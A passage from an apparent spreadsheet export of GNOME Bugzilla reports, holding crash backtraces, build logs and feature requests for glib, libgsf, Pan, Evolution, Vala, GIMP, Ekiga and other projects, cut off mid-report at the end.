/bin/sh: line 1:  5098 Terminated              G_DEBUG=gc-friendly MALLOC_CHECK_=2 MALLOC_PERTURB_=$((${RANDOM:-256} % 256)) ../../glib/gtester --verbose io-stream memory-input-stream memory-output-stream readwrite g-file g-file-info converter-stream data-input-stream data-output-stream g-icon buffered-input-stream buffered-output-stream sleepy-stream filter-streams volumemonitor simple-async-result srvtarget contexts gsettings gschema-compile async-close-output-stream gdbus-addresses network-address gdbus-message socket pollable tls-certificate tls-interaction cancellable vfs network-monitor fileattributematcher gmenumodel resources actions gdbus-close-pending gdbus-connection gdbus-connection-flush gdbus-connection-loss gdbus-connection-slow gdbus-names gdbus-proxy gdbus-proxy-threads gdbus-proxy-well-known-name gdbus-introspection gdbus-threading gdbus-export gdbus-error gdbus-peer gdbus-exit-on-close gdbus-non-socket gdbus-bz627724 appinfo contenttype mimeapps file live-g-file desktop-app-info unix-fd unix-streams gapplication basic-application gdbus-test-codegen gdbus-serialization
This happens because of a segmentation fault:
Starting program: /var/tmp/portage/dev-libs/glib-2.32.1/work/glib-2.32.1/gio/tests/.libs/contenttype 
[Thread debugging using libthread_db enabled]
/contenttype/guess: 
Program received signal SIGSEGV Segmentation fault.
cache_magic_matchlet_compare_to_data (len=18446744073709551615 data=0x401c40 offset= cache=)
    at xdgmimecache.c:199
199		      if (((unsigned char *)cache-&gt;buffer)[data_offset + j] != ((unsigned char *) data)[j + i])
(gdb) bt
#0  cache_magic_matchlet_compare_to_data (len=18446744073709551615 data=0x401c40 offset= cache=)
    at xdgmimecache.c:199
#1  cache_magic_matchlet_compare (cache= offset= data=0x401c40 len=18446744073709551615)
    at xdgmimecache.c:225
#2  0x00007ffff760a212 in cache_magic_compare_to_data (prio= len=18446744073709551615 data=0x401c40 
    offset=64104 cache=0x6118f0) at xdgmimecache.c:257
#3  cache_magic_lookup_data (prio= len=18446744073709551615 data=0x401c40 cache=0x6118f0 
    mime_types= n_mime_types=) at xdgmimecache.c:293
#4  cache_get_mime_type_for_data (n_mime_types=0 mime_types=0x0 result_prio=0x7fffffffd31c len=18446744073709551615 
    data=0x401c40) at xdgmimecache.c:710
#5  __gio_xdg_cache_get_mime_type_for_data (data=0x401c40 len=18446744073709551615 result_prio=0x7fffffffd31c)
    at xdgmimecache.c:740
#6  0x00007ffff7557a71 in g_content_type_guess (filename=0x401a04 foo 
    data=0x401c40 [Desktop Entry]\nType=Application\nName=appinfo-test\nExec=./appinfo-test --option\n 
    data_size=18446744073709551615 result_uncertain=0x7fffffffd36c) at gcontenttype.c:939
#7  0x000000000040142c in test_guess () at contenttype.c:43
#8  0x00007ffff7b26c14 in ?? () from /usr/lib64/libglib-2.0.so.0
#9  0x00007ffff7b26d9e in ?? () from /usr/lib64/libglib-2.0.so.0
#10 0x00007ffff7b270db in g_test_run_suite () from /usr/lib64/libglib-2.0.so.0
#11 0x0000000000401810 in main (argc=1 argv=0x7fffffffd688) at contenttype.c:200</t>
  </si>
  <si>
    <t>LIBGSF-133238</t>
  </si>
  <si>
    <t>Libgsf won't build documentation</t>
  </si>
  <si>
    <t>Hi
I'm using jhbuild to build Gnome CVS and when it comes to libgsf it fails
to build the documentation.
The error is the following :
make[2]: Entering directory `/root/cvs/gnome2/libgsf/doc'
*** Scanning header files ***
if grep -l '^..*$' ./gsf.types &gt; /dev/null  then \
    CC= LD= CFLAGS=-I.. -I/usr/include/glib-2.0
-I/usr/lib/glib-2.0/include -I/usr/include/libxml2  
LDFLAGS=-lgobject-2.0 -lglib-2.0 -lxml2 -lpthread -lz -lm  
gtkdoc-scangobj --type-init-func=g_type_init ()  --module=gsf
--output-dir=.  \
else \
    cd .  \
    for i in gsf.args           gsf.hierarchy   gsf.signals  do \
               test -f $i || touch $i  \
    done \
fi
cd . &amp;&amp; \
  gtkdoc-scan --module=gsf --source-dir=../gsf
--ignore-headers=biff-types.h  ../gsf-gnome/*.h
touch scan-build.stamp
*** Rebuilding template files ***
cd . &amp;&amp; gtkdoc-mktmpl --module=gsf
WARNING: No declaration for: GsfOff_t
WARNING: No declaration for: IS_GSF_INPUT
WARNING: No declaration for: IS_GSF_INPUT_CLASS
WARNING: No declaration for: IS_GSF_INFILE
WARNING: No declaration for: IS_GSF_INFILE_CLASS
WARNING: No declaration for: IS_GSF_INPUT_STDIO
WARNING: No declaration for: GsfInputMMap
WARNING: No declaration for: IS_GSF_INPUT_MEMORY
WARNING: No declaration for: GSF_INPUT_MMAP_TYPE
WARNING: No declaration for: GSF_INPUT_MMAP
WARNING: No declaration for: IS_GSF_INPUT_MMAP
WARNING: No declaration for: gsf_input_mmap_get_type
WARNING: No declaration for: GsfMSOleProperty
WARNING: No declaration for: GSF_OLE_GET_GUINT8
WARNING: No declaration for: GSF_OLE_GET_GUINT16
WARNING: No declaration for: GSF_OLE_GET_GUINT32
WARNING: No declaration for: IS_GSF_INFILE_MSOLE
WARNING: No declaration for: IS_GSF_INFILE_ZIP
WARNING: No declaration for: IS_GSF_OUTPUT_CLASS
WARNING: No declaration for: IS_GSF_OUTPUT
WARNING: No declaration for: gsf_output_error
WARNING: No declaration for: IS_GSF_INPUT_GZIP
WARNING: No declaration for: IS_GSF_OUTFILE
WARNING: No declaration for: IS_GSF_INPUT_TEXTLINE
WARNING: No declaration for: IS_GSF_SHARED_MEMORY
=============================================================================
WARNING: 395 unused declarations.
  These can be found in gsf-unused.txt.
  They should be added to gsf-sections.txt in the appropriate place.
=============================================================================
touch tmpl-build.stamp
*** Building SGML ***
cd . &amp;&amp; \
gtkdoc-mkdb --module=gsf --source-dir=../gsf --sgml-mode
WARNING: No declaration for: GsfOff_t
WARNING: No declaration for: IS_GSF_INPUT
WARNING: No declaration for: IS_GSF_INPUT_CLASS
WARNING: No declaration for: IS_GSF_INFILE
WARNING: No declaration for: IS_GSF_INFILE_CLASS
WARNING: No declaration for: IS_GSF_INPUT_STDIO
WARNING: No declaration for: GsfInputMMap
WARNING: No declaration for: IS_GSF_INPUT_MEMORY
WARNING: No declaration for: GSF_INPUT_MMAP_TYPE
WARNING: No declaration for: GSF_INPUT_MMAP
WARNING: No declaration for: IS_GSF_INPUT_MMAP
WARNING: No declaration for: gsf_input_mmap_get_type
WARNING: No declaration for: GsfMSOleProperty
WARNING: No declaration for: GSF_OLE_GET_GUINT8
WARNING: No declaration for: GSF_OLE_GET_GUINT16
WARNING: No declaration for: GSF_OLE_GET_GUINT32
WARNING: No declaration for: IS_GSF_INFILE_MSOLE
WARNING: No declaration for: IS_GSF_INFILE_ZIP
WARNING: No declaration for: IS_GSF_OUTPUT_CLASS
WARNING: No declaration for: IS_GSF_OUTPUT
WARNING: No declaration for: gsf_output_error
WARNING: No declaration for: IS_GSF_INPUT_GZIP
WARNING: No declaration for: IS_GSF_OUTFILE
WARNING: No declaration for: IS_GSF_INPUT_TEXTLINE
WARNING: No declaration for: IS_GSF_SHARED_MEMORY
21% symbol docs coverage (15 symbols documented 57 not documented)
See gsf-undocumented.txt for a list of missing docs.
The doc coverage percentage doesn't include intro sections.
touch sgml-build.stamp
*** Building HTML ***
rm -rf ./html 
mkdir ./html
cd ./html &amp;&amp; gtkdoc-mkhtml gsf ../gsf-docs.sgml
/usr/bin/openjade:../sgml/gsf-infile-impl.sgml:40:10:E: end tag for
REFSECT1 which is not finished
make[2]: *** [html-build.stamp] Error 1
make[2]: Leaving directory `/root/cvs/gnome2/libgsf/doc'</t>
  </si>
  <si>
    <t>installation_fault_association</t>
  </si>
  <si>
    <t>PAN-70876</t>
  </si>
  <si>
    <t>Changement d'option de vue d'un article</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: normal
Version: 0.9.7
Synopsis: Changement d'option de vue d'un article
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
charger un group
developper les arboressences
menu Vue &gt; Option d'articles
Plantage de Pan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New Thread 1024 (LWP 3009)]
[New Thread 2049 (LWP 3010)]
[New Thread 1026 (LWP 3011)]
0x40517c09 in __wait4 () from /lib/libc.so.6
#0  0x40517c09 in __wait4 () from /lib/libc.so.6
#1  0x40593fd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x404598de in waitpid (pid=3030 stat_loc=0xbffff4ec options=0)
    at wrapsyscall.c:172
#3  0x4009ee88 in gnome_segv_handle () at eval.c:41
#4  0x404574c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 2 esi = 148265348 ebp = 3221223576 esp = 3221223572 ebx = 1077593876 edx = 0 ecx = 3221223792 eax = 22 trapno = 14 err = 4 eip = 1076457672 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 3221223572 ss = 43 __ssh = 0 fpstate = 0xbffff618 oldmask = 2147483648 cr2 = 8}) at signals.c:97
#5  
#6  0x402970c8 in expose_predicate () at eval.c:41
#7  0x402e6b5f in XCheckIfEvent () at eval.c:41
#8  0x4029734b in gdk_compress_exposures () at eval.c:41
#9  0x402985b1 in gdk_event_translate () at eval.c:41
#10 0x40298b20 in gdk_events_queue () at eval.c:41
#11 0x40298d5d in gdk_event_dispatch () at eval.c:41
#12 0x40433773 in g_main_dispatch () at eval.c:41
#13 0x40433d39 in g_main_iterate () at eval.c:41
#14 0x40433eec in g_main_run () at eval.c:41
#15 0x401e7333 in gtk_main () at eval.c:41
#16 0x08075f91 in main () at eval.c:41
#17 0x40480306 in __libc_start_main (main=0x8075ca0  argc=1 
    ubp_av=0xbffffc74 init=0x8058d7c  fini=0x80b8010  
    rtld_fini=0x4000d2cc  stack_end=0xbffffc6c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40517c09 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40593fd0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x404598de in waitpid (pid=3030 stat_loc=0xbffff4ec options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff4ec
options = 0
result = 0
oldtype = 0
#3  0x4009ee88 in gnome_segv_handle () at eval.c:41
	in eval.c
ap = (void **) 0xbffff618
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
result = 3221222936
result = 3221222936
value = (void *) 0xbffff4ec
#4  0x404574c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 2 esi = 148265348 ebp = 3221223576 esp = 3221223572 ebx = 1077593876 edx = 0 ecx = 3221223792 eax = 22 trapno = 14 err = 4 eip = 1076457672 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 3221223572 ss = 43 __ssh = 0 fpstate = 0xbffff618 oldmask = 2147483648 cr2 = 8}) at signals.c:97
	in signals.c
self = 0x40460460
in_sighandler = 0x0
self = 0x40460460
in_sighandler = 0x0
#5  
No locals.
#6  0x402970c8 in expose_predicate () at eval.c:41
	in eval.c
ap = (void **) 0x8d65984
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
result = 148265348
result = 148265348
value = (void *) 0xbffff4ec
#7  0x402e6b5f in XCheckIfEvent () at eval.c:41
41	in eval.c
ap = (void **) 0x8d65984
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
result = 148265348
result = 148265348
value = (void *) 0xbffff4ec
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-02-07 20:51 -------
The original reporter (velleda@mail.ru) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>velleda</t>
  </si>
  <si>
    <t>WEBSITE-348283</t>
  </si>
  <si>
    <t>cannot allow comments on individual blog entries</t>
  </si>
  <si>
    <t>There is a checkbutton in the edit-message (and in the preferences) to allow comments only to individual blog entries. However this button doesn't do anything. The only way to allow comments is to allow them anywhere which is not always preferred.
In addition it would be nice to add the same checkbutton also to the UI when posting a new message probably only when the relevant preferences have been enabled.</t>
  </si>
  <si>
    <t>CONGLOMERATE-113126</t>
  </si>
  <si>
    <t>New pages: Bugs and CVS</t>
  </si>
  <si>
    <t>I've created some new pages: bugs.php and cvs.php.  They work on my local
Apache test except that they need new PNG files for the title images</t>
  </si>
  <si>
    <t>GIMP-483003</t>
  </si>
  <si>
    <t>Icon (.ico) Extension Registration Problem</t>
  </si>
  <si>
    <t>First off LOVE the program!! All of you have done a great job at making it better keep up the great work! :o)
--------------------
The .ico file extension DOES NOT need to change the (Default) Property Data Value in the registry.  This causes the .ico files to show a GIMP Icon vs. its own 'Natural Icon' on a default Windows installation.  This makes it harder to know what the icon actually looks like prior to editing or selecting from a list on the fly.
Nor is there a way under the 'Preferences Dialog' to add/remove/change file extensions once they have been set by the installer.  If there is it's not easily accessible.  I had to make these changes by hand to put back 
Below is a Suggestion of 2 Options:
 (the 2nd one seems to be more efficient)
-----------------------------------------
Option 1:
=========
  2.4 RC3 Currently Changes the following Settings:
  HKCR = HKEY_CLASSES_ROOT
  [Default Windows]
     HKCR\.ico\(Default)=icofile
  [Gimp Installatino]
     HKCR\.ico\(Default)=GIMP-2.0-ico
  * The installation should stick w/ the Default Windows value of icofile
Option 2:
=========
  [CURENTLY]
    HKCR\Gimp2-2.0-ico\DefaultIcon\
    (DEFAULT)=Z:\path_to\GIMP-2.0\bin\gimp-2.4.exe1
  [Change To]
    HKCR\Gimp2-2.0-ico\DefaultIcon\
    (DEFAULT)=%1
  * By using the 2nd option you can use Gimp options compatible with the the current Inno Installer Script yet retaining the Preview of Icons.
Thank you very much
Look forward to the changes &amp; the great work ahead.</t>
  </si>
  <si>
    <t>d0ng2000</t>
  </si>
  <si>
    <t>GTK+-98189</t>
  </si>
  <si>
    <t>moveresize emulation asserts on double click</t>
  </si>
  <si>
    <t>Doing a double click on the resize grip of a statusbar or the resize
grips example of testgtk while running an non-EWMH WM like twm or
blackbox you get
Gdk-ERROR **: file gdkwindow-x11.c: line 4734 (create_moveresize_window):
assertion failed: (mv_resize-&gt;moveresize_emulation_window == NULL)
aborting...
Trace/breakpoint trap</t>
  </si>
  <si>
    <t>SOUND-JUICER-336895</t>
  </si>
  <si>
    <t>Album information not detected</t>
  </si>
  <si>
    <t>Please describe the problem:
Sometimes when I insert a CD and sound-juicer comes up it simply displays
Unknown Album/Unknown Artist/Track 1 etc. instead of fetching the album
information from the internet.  I know my internet connection is working and
Banshee and Rhythmbox properly detect the album and fetch its information.  On
one occasion when I noticed this problem  Banshee has also told me there was no
internet connection although my connection was working fine so there may be
some underlying problem beyond sound-juicer.
If I start with the command line I don't get any errors warnings or any other
output.
Steps to reproduce:
It can't consistently be reproduced--I haven't seen any pattern for when it does
and doesn't work.
Actual results:
Normally the CD information is propertly detected sometimes it is not.
Expected results:
I would expect the CD information to be downloaded and displayed automatically.
Does this happen every time?
No only occasionally.
Other information:</t>
  </si>
  <si>
    <t>joseph.hill</t>
  </si>
  <si>
    <t>METACITY-170006</t>
  </si>
  <si>
    <t>Full screen flashing bell should be rate-limited</t>
  </si>
  <si>
    <t>I have my flashing bell set to just the window titlebar. When for example I
cat a binary file I hear a bunch of beeps but the flashing titlebar gets
rate-limited. However if no window has the focus or the focused window is a
desktop or a menu it switches to full-screen bell. (Aside: would it be possible
to flash the window that requested the bell instead of the current window?)
Try it out: Turn on visual bell and then say sleep 1 python -c print chr(7) *
50 and focus the desktop. You get a whole bunch of annoying flashes.
In short: the fullscreen flash should be rate-limited just like the titlebar flash.</t>
  </si>
  <si>
    <t>jleedev</t>
  </si>
  <si>
    <t>BONOBO-ACTIVATION_[WAS:_OAF]-41956</t>
  </si>
  <si>
    <t>oaf config does not reject libxml 2</t>
  </si>
  <si>
    <t xml:space="preserve">The folks at Sun tried to use oafd with libxml2. This was an error but it was
not caught by the configure script (which does not reject libxml2). Also when
we switch to libxml2 eventually we will have to address this.
------- Additional Comments From darin@bentspoon.com 2000-08-04 09:46:44 ----
See also bug 41957 and bug 41958.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:38 -------
</t>
  </si>
  <si>
    <t>EVOLUTION-251217</t>
  </si>
  <si>
    <t>Got Object ID already exists error creating new meeting</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Selected New meeting from Evo toolbar's New button drop downlist. In the
appointment editor I added one attendee and after adding a Summary
Location and description I clicked save. I then got the following Error 
popup dialog:
  Object ID already exists
The meeting was created however and the invitation was sent.
How often does this happen? 
Additional Information:
Output from evolution
---------------------------------------------------------------------------
Starting program: /usr/bin/evolution-1.5
[New Thread 16384 (LWP 23208)]
[New Thread 32769 (LWP 23212)]
[New Thread 16386 (LWP 23213)]
setting folder indexing off
setv:'Inbox' flags 00000001
setting folder indexing off
setv:'Outbox' flags 00000001
setting folder indexing off
setv:'Sent' flags 00000001
[New Thread 32771 (LWP 23214)]
[New Thread 49156 (LWP 23215)]
[Thread 49156 (LWP 23215) exited]
asked to activate component_id `OAFIID:GNOME_Evolution_Addressbook_Component'
(evolution-1.5:23208): Bonobo-WARNING **: Could not find GNOME pixmap file
/usr/share/pixmaps/web-support-16.png
[New Thread 65541 (LWP 23218)]
libecal-Message: e-cal.c:960: Activating calendar factory
(OAFIID:GNOME_Evolution_DataServer_CalFactory)
[New Thread 81926 (LWP 23220)]
libecal-Message: notify_categories
libecal-Message: e-cal.c:960: Activating calendar factory
(OAFIID:GNOME_Evolution_DataServer_CalFactory)
libecal-Message: notify_categories
[New Thread 98311 (LWP 23221)]
[Thread 81926 (LWP 23220) exited]
(evolution-1.5:23208): Bonobo-WARNING **: Could not find GNOME pixmap file
/usr/share/pixmaps/web-support-16.png
(evolution-1.5:23208): Bonobo-WARNING **: Could not find GNOME pixmap file
/usr/share/pixmaps/web-support-16.png
[Thread 98311 (LWP 23221) exited]
[New Thread 114696 (LWP 23223)]
[Thread 114696 (LWP 23223) exited]
[New Thread 131081 (LWP 23224)]
[New Thread 147466 (LWP 23226)]
[New Thread 163851 (LWP 23227)]
[New Thread 180236 (LWP 23228)]
[Thread 147466 (LWP 23226) exited]
[Thread 180236 (LWP 23228) exited]
[Thread 163851 (LWP 23227) exited]
[New Thread 196621 (LWP 23233)]
[New Thread 213006 (LWP 23234)]
[Thread 196621 (LWP 23233) exited]
(evolution-1.5:23208): GLib-GObject-WARNING **: gsignal.c:1893: signal
`obj_updated' is invalid for instance `0x8296588'
(evolution-1.5:23208): GLib-GObject-WARNING **: gsignal.c:1893: signal
`obj_removed' is invalid for instance `0x8296588'
[Thread 213006 (LWP 23234) exited]
[New Thread 229391 (LWP 23236)]
[Thread 229391 (LWP 23236) exited]
asked to activate component_id
`OAFIID:GNOME_Evolution_Addressbook_SelectNames_2'
[New Thread 245776 (LWP 23238)]
[Thread 245776 (LWP 23238) exited]
[New Thread 262161 (LWP 23253)]
[Thread 262161 (LWP 23253) exited]
[New Thread 278546 (LWP 23256)]
[New Thread 294931 (LWP 23257)]
[Thread 278546 (LWP 23256) exited]
asked to activate component_id
`OAFIID:GNOME_Evolution_Addressbook_SelectNames_2'
(evolution-1.5:23208): evolution-shell-CRITICAL **: file
evolution-folder-selector-button.c: line 335
(evolution_folder_selector_button_construct): assertion
`EVOLUTION_IS_SHELL_CLIENT (shell_client)' failed
(evolution-1.5:23208): gtkhtml-WARNING **: Cannot create spell dictionary
instance (iid:OAFIID:GNOME_Spell_Dictionary:0.3)
(evolution-1.5:23208): Bonobo-WARNING **: Activation exception 'Failed to
activate 'OAFIID:GNOME_Spell_Control:0.3''
(evolution-1.5:23208): EBook-CRITICAL **: file eab-book-util.c: line 63
(eab_name_and_email_query): assertion `book &amp;&amp; E_IS_BOOK (book)' failed
(evolution-1.5:23208): Gdk-CRITICAL **: file gdkwindow.c: line 2329
(gdk_window_invalidate_maybe_recurse): assertion `window != NULL' failed
[New Thread 311316 (LWP 23259)]
[Thread 311316 (LWP 23259) exited]
[New Thread 327701 (LWP 23260)]
(evolution-1.5:23208): calendar-gui-WARNING **: comp-util.c:231: Backend is
busy[Thread 294931 (LWP 23257) exited]
(evolution-1.5:23208): Gtk-CRITICAL **: file gtktreeview.c: line 4059
(validate_visible_area): assertion `has_next' failed.
There is a disparity between the internal view of the GtkTreeView
and the GtkTreeModel.  This generally means that the model has changed
without letting the view know.  Any display from now on is likely to
be incorrect.
(evolution-1.5:23208): Gtk-CRITICAL **: file gtktreeview.c: line 4059
(validate_visible_area): assertion `has_next' failed.
There is a disparity between the internal view of the GtkTreeView
and the GtkTreeModel.  This generally means that the model has changed
without letting the view know.  Any display from now on is likely to
be incorrect.
[New Thread 344086 (LWP 23264)]
[New Thread 360471 (LWP 23265)]
[Thread 360471 (LWP 23265) exited]
[Thread 344086 (LWP 23264) exited]
[New Thread 376856 (LWP 23270)]
[Thread 376856 (LWP 23270) exited]
camel_junk_plugin_check_junk
em_junk_sa_check_junk
pipe_to_sa /bin/sh -c spamassassin --version
junk filter =&gt; clean
getv:'Sent' flags 00000001
getv:'Outbox' flags 00000001
getv:'Sent' flags 00000001
getv:'Inbox' flags 00000001
[New Thread 393241 (LWP 23317)]
Output from evolution
---------------------------------------------------------------------------
evolution-data-server-Message: Starting server
evolution-data-server-Message: Server up and running
[New Thread 32769 (LWP 23205)]
[New Thread 16386 (LWP 23206)]
[New Thread 32771 (LWP 23219)]
libecalbackendfile-Message: e-cal-backend-file.c:1191: Starting query (#t)
libecalbackendfile-Message: e-cal-backend-file.c:1191: Starting query (#t)
libecalbackendfile-Message: e-cal-backend-file.c:1191: Starting query (#t)
libecalbackendfile-Message: e-cal-backend-file.c:1191: Starting query (#t)
libecalbackendfile-Message: e-cal-backend-file.c:1191: Starting query (#t)
libecalbackendfile-Message: e-cal-backend-file.c:1191: Starting query ((and
(occur-in-time-range? (make-time 20031027T000000Z)                      
    (make-time 20031208T000000Z))     #t))
(evolution-data-server:23225): libedata-book-WARNING **: no summary present
(evolution-data-server:23232): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23232): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23232): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23232): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23232): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23232): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23263): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23263): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23263): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t
(evolution-data-server:23263): e-data-server-WARNING **: Error in
execution: occur-in-time-range? expects argument 1 to be a time_t</t>
  </si>
  <si>
    <t>GNOME-VFS-316529</t>
  </si>
  <si>
    <t>gnome-vfs should use libtool -export-symbols-regex</t>
  </si>
  <si>
    <t>Attached find a patch that adds the libtool -export-symbols-regex to gnome-vfs. 
This causes gnome-vfs to not export private symbols that start with an _ symbol.
This technique is used by glib/gtk+/libgnome* libraries.
In order to get this to work I had to make a few minor changes to the private
interfaces:
+ A handful of private interfaces are actually used by the gnome-vfs-daemon so
  I renamed these interfaces so they do not start with a _ and end with the 
  word private.  This is a convention followed by other GNOME Platform
  libraries and is a better way to distinguish these private interfaces as
  being ones that actually need to be exported but are not for general use.
+ I added gnome-vfs-filesystem-type.c and gnome-vfs-cdrom as sources linked
  into the daemon rather than renaming the interfaces as above.  I did this
  because the interfaces defined in these files are self-contained and this
  allows the daemon access to the interfaces without exposing them.
+ I changed _gnome_vfs_get_daemon_volume_monitor_type to be an exposed 
  interface.  Normally in GNOME libraries the *get_type interfaces are
  exposed.  Furthermore the daemon requires this interfaces.  If this
  type is private perhaps it should be renamed to
  daemon_volume_monitor_private
+ In libgnomevfs-gnome-vfs-mime-handlers I changed __FUNCTION__ which is
  GNU specific to G_GNUC_FUNCTION which is a safer way to specify the same
  thing so the code compiles even if not using gcc.
I hope you find this patch acceptable but I'm happy to further tweak it if
the maintainer has better suggestions of how to support -export-symbols-regex
in gnome-vfs.</t>
  </si>
  <si>
    <t>EOG-164301</t>
  </si>
  <si>
    <t>Message in eog needs ngettext</t>
  </si>
  <si>
    <t>#: shell/main.c:258
# c-format
msgid 
You are about to open %i windows simultaneously. Do you want to open them in 
a collection instead?
This message most likely needs ngettext support. See
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#plurals .</t>
  </si>
  <si>
    <t>VALA-476953</t>
  </si>
  <si>
    <t>crash when compiling DBusSample</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Try to compile the Vala/DBusSample from the wiki
Stack trace:
gdb&gt; bt
#0  0xb7eea0bc in vala_data_type_is_subtype_of (self=0x0 t=0x80b30f8) at valadatatype.c:459
#1  0xb7e8ba0b in vala_code_generator_get_implicit_cast_expression (self=0x82cf038 cexpr=0x82d4cf0 expression_type=0x82a8080 target_type=0x82d05c0) at valacodegenerator.c:6087
#2  0xb7e98aad in vala_code_generator_real_visit_end_invocation_expression (base=0x82cf038 expr=0x82ac9c8) at valacodegenerator.c:9701
#3  0xb7ee309b in vala_code_visitor_visit_end_invocation_expression (self=0x82cf038 expr=0x82ac9c8) at valacodevisitor.c:1261
#4  0xb7eff8dc in vala_invocation_expression_real_accept (base=0x82ac9c8 visitor=0x82cf038) at valainvocationexpression.c:144
#5  0xb7ee17c8 in vala_code_node_accept (self=0x82ac9c8 visitor=0x82cf038) at valacodenode.c:69
#6  0xb7ed2349 in vala_assignment_real_accept (base=0x82aca30 visitor=0x82cf038) at valaassignment.c:85
#7  0xb7ee17c8 in vala_code_node_accept (self=0x82aca30 visitor=0x82cf038) at valacodenode.c:69
#8  0xb7ef0e21 in vala_expression_statement_real_accept (base=0x82a4cc8 visitor=0x82cf038) at valaexpressionstatement.c:80
#9  0xb7ee17c8 in vala_code_node_accept (self=0x82a4cc8 visitor=0x82cf038) at valacodenode.c:69
#10 0xb7ed594d in vala_block_real_accept (base=0x829e980 visitor=0x82cf038) at valablock.c:128
#11 0xb7ee17c8 in vala_code_node_accept (self=0x829e980 visitor=0x82cf038) at valacodenode.c:69
#12 0xb7f08246 in vala_method_real_accept_children (base=0x829f3f0 visitor=0x82cf038) at valamethod.c:208
#13 0xb7ee17e8 in vala_code_node_accept_children (self=0x829f3f0 visitor=0x82cf038) at valacodenode.c:87
#14 0xb7e8c6c4 in vala_code_generator_real_visit_method (base=0x82cf038 m=0x829f3f0) at valacodegenerator.c:11111
#15 0xb7ee2a98 in vala_code_visitor_visit_method (self=0x82cf038 m=0x829f3f0) at valacodevisitor.c:397
#16 0xb7f082d2 in vala_method_real_accept (base=0x829f3f0 visitor=0x82cf038) at valamethod.c:165
#17 0xb7ee17c8 in vala_code_node_accept (self=0x829f3f0 visitor=0x82cf038) at valacodenode.c:69
#18 0xb7edc456 in vala_class_real_accept_children (base=0x828cb78 visitor=0x82cf038) at valaclass.c:464
#19 0xb7ee17e8 in vala_code_node_accept_children (self=0x828cb78 visitor=0x82cf038) at valacodenode.c:87
#20 0xb7ea13dc in vala_code_generator_real_visit_class (base=0x82cf038 cl=0x828cb78) at valacodegenerator.c:7348
#21 0xb7ee2978 in vala_code_visitor_visit_class (self=0x82cf038 cl=0x828cb78) at valacodevisitor.c:235
#22 0xb7edc792 in vala_class_real_accept (base=0x828cb78 visitor=0x82cf038) at valaclass.c:386
#23 0xb7ee17c8 in vala_code_node_accept (self=0x828cb78 visitor=0x82cf038) at valacodenode.c:69
#24 0xb7f2ff35 in vala_source_file_accept_children (self=0x8055910 visitor=0x82cf038) at valasourcefile.c:182
#25 0xb7e85a6c in vala_code_generator_real_visit_source_file (base=0x82cf038 source_file=0x8055910) at valacodegenerator.c:13815
#26 0xb7ee2938 in vala_code_visitor_visit_source_file (self=0x82cf038 source_file=0x8055910) at valacodevisitor.c:199
#27 0xb7f30002 in vala_source_file_accept (self=0x8055910 visitor=0x82cf038) at valasourcefile.c:150
#28 0xb7ebf4d6 in vala_code_generator_emit (self=0x82cf038 context=0x8055808) at valacodegenerator.c:553
#29 0x0804ab88 in main (argc=0x0 argv=0xe0002000) at valacompiler.c:414
Other information:
the problem seems to be triggered when using the PurpleInterface.</t>
  </si>
  <si>
    <t>PANGO-359073</t>
  </si>
  <si>
    <t>font family sans-serif doesn't work with pango cairo on win32</t>
  </si>
  <si>
    <t>The recommended font to use in pango apps is sans-serif (from the CSS font name) but on Windows it prints a warning about falling back to Sans instead. While on Linux Sans is the compatibility/deprecated name you aren't supposed to use.</t>
  </si>
  <si>
    <t>GNOME-UTILS-574105</t>
  </si>
  <si>
    <t>Do not show gvfs fuse filesystem in pref dialog</t>
  </si>
  <si>
    <t>(smoketesting 2.25.92)
Open baobab.
Open the pref dialog.
See that there's an item in the treeview for a gvfs filesystem (actually it's not mine: it's the one of another user who's also logged in).
This shouldn't be here. If you look at gnome-system-monitor for example it's not there. I don't know if g-s-m looks at the size of the fs or if it does something else but baobab should do the same.</t>
  </si>
  <si>
    <t>EKIGA-123718</t>
  </si>
  <si>
    <t>gconf:video_display/fullscreen is evil when buggy</t>
  </si>
  <si>
    <t>hi.
i've got a notebook where in contrast to other installations i'm running
fullscreen mode does not seem to work. the screen remains black. X11 is not
hung but gnomemeeting itself seems to be. consequently you do not get out
of the black fullscreen display anymore. you'd need to switch to the
console to kill gnomemeeting.
now the following thing happens:
fullscreen settings are saved. unfortunately they cannot be reset from the
